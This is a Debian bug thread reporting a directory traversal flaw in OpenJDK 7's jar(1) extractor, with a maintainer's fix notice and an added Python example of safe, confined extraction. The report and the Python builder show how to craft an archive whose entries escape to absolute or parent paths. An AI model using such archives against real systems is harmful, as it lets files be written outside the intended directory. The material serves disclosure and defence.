Control: fixed -1 7u79-2.5.5-1

Hi,

On Fri, Jan 09, 2015 at 03:17:29PM +0300, Alexander Cherepanov wrote:
> Package: openjdk-7-jdk
> Version: 7u71-2.5.3-2
> Tags: security
>
> jar(1) is susceptible to a directory traversal vulnerability. While
> extracting an archive, it will happily use absolute and relative paths taken
> from the archive. This can be exploited by a malicious archive to write
> files outside the current directory.
>
> For example, let's create a sample archive:
>
> $ mkdir Xtmp/ XX/
> $ touch Xtmp/abs XX/rel
> $ jar -cMvf test.jar Xtmp/abs XX/rel
> $ sed -i 's|Xtmp/|/tmp/|g;s|XX/|../|g' test.jar
> $ rm -r Xtmp/ XX/
>
> and then test it:
>
> $ ls /tmp/abs ../rel
> ls: cannot access /tmp/abs: No such file or directory
> ls: cannot access ../rel: No such file or directory
>
> $ jar -xvf test.jar
> extracted: /tmp/abs
> extracted: ../rel
>
> $ ls /tmp/abs ../rel
> ../rel /tmp/abs
>
> My `jar` points to /etc/alternatives/jar, which points to
> /usr/lib/jvm/java-7-openjdk-amd64/bin/jar .
>
> Not sure if this is just CVE-2005-1080 not fixed or something else. But
> please note that CVE-2005-1080 talks about .. only.

This should be fixed with 7u79-2.5.5-1.

Regards,
Salvatore
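The report above shows both traversal shapes an extractor has to refuse: an absolute entry name (/tmp/abs) and a parent-relative one (../rel). The following is an added example, not code from the bug thread or from OpenJDK's jar tool: it builds a zip archive whose entry names are constructed to match the ones the report's sed rewrite produces, then extracts it with a path-confinement check that rejects absolute names, any ".." component, and any name whose resolved path leaves the destination directory. The archive contents, the entry names and the temporary destination directory are all constructed for the demonstration.

```python
"""Added example: reproduce the archive shape from the jar(1) report and
extract it with a confinement check. Not part of the original thread."""
import io
import os
import posixpath
import tempfile
import zipfile


def build_malicious_archive() -> bytes:
    """Constructed archive with the two hostile entry names from the report
    plus one benign entry. ZipFile.writestr stores names verbatim, so the
    leading '/' and the '../' survive exactly as a hand-edited jar would."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("/tmp/abs", "absolute path entry\n")
        zf.writestr("../rel", "parent-relative entry\n")
        zf.writestr("ok/inner.txt", "benign entry\n")
    return buf.getvalue()


def is_confined(entry_name: str, dest_dir: str) -> bool:
    """True only if entry_name would land inside dest_dir.

    Three checks, each catching a case the others might miss:
      1. absolute names ('/tmp/abs');
      2. any '..' path component ('../rel');
      3. the realpath prefix, which also rejects names such as 'ok/../../x'
         and paths that escape through an existing symlink in dest_dir.
    """
    if posixpath.isabs(entry_name) or os.path.isabs(entry_name):
        return False
    if ".." in entry_name.replace("\\", "/").split("/"):
        return False
    root = os.path.realpath(dest_dir)
    target = os.path.realpath(os.path.join(root, entry_name))
    return target == root or target.startswith(root + os.sep)


def safe_extract(archive: bytes, dest_dir: str):
    """Extract only confined entries. Returns (extracted, rejected) name lists
    so the caller can log or fail on rejected entries instead of silently
    dropping them."""
    extracted, rejected = [], []
    with zipfile.ZipFile(io.BytesIO(archive)) as zf:
        for info in zf.infolist():
            if not is_confined(info.filename, dest_dir):
                rejected.append(info.filename)
                continue
            target = os.path.join(dest_dir, info.filename)
            if info.is_dir():
                os.makedirs(target, exist_ok=True)
            else:
                os.makedirs(os.path.dirname(target), exist_ok=True)
                with zf.open(info) as src, open(target, "wb") as dst:
                    dst.write(src.read())
            extracted.append(info.filename)
    return extracted, rejected


def demo():
    """Run the constructed archive through safe_extract in a fresh temp dir."""
    with tempfile.TemporaryDirectory() as dest:
        return safe_extract(build_malicious_archive(), dest)


if __name__ == "__main__":
    extracted, rejected = demo()
    print("extracted:", extracted)
    print("rejected: ", rejected)
```

The two name-based checks are cheap and produce a clear reason for rejection; the realpath prefix check is the one that actually decides, because it is evaluated against the real filesystem (symlinks included) rather than against the string the archive supplied.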